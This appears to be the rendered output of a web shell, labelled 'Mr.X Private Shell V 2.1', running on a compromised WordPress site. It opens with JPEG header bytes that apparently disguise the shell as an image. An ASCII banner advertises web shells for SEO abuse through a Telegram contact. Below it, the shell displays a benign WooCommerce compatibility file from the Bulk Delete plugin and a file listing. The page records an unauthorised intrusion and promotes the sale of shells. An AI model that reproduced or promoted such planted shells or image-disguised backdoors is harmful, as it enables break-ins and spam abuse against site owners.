����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
<?php
/**
* Code to enable compatibility with 'WooCommerce' plugin.
*
* @since 5.5.1
*
* @author Sudar
*
* @package BulkDelete\Util\Compatibility
*/
defined( 'ABSPATH' ) || exit; // Exit if accessed directly
/**
* Deregister select2 script registered by WooCommerce plugin.
* WooCommerce is using an older version of select2 which is conflicting with the version used by Bulk WP.
*
* @see https://github.com/sudar/bulk-delete/issues/111
* @see https://github.com/woothemes/woocommerce/issues/8766
* @since 5.5.1
*/
function bd_deregister_woo_select2() {
wp_deregister_script( 'select2' );
}
add_action( 'bd_before_admin_enqueue_scripts', 'bd_deregister_woo_select2' );
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| woocommerce.php | File | 686 B | 0644 |
|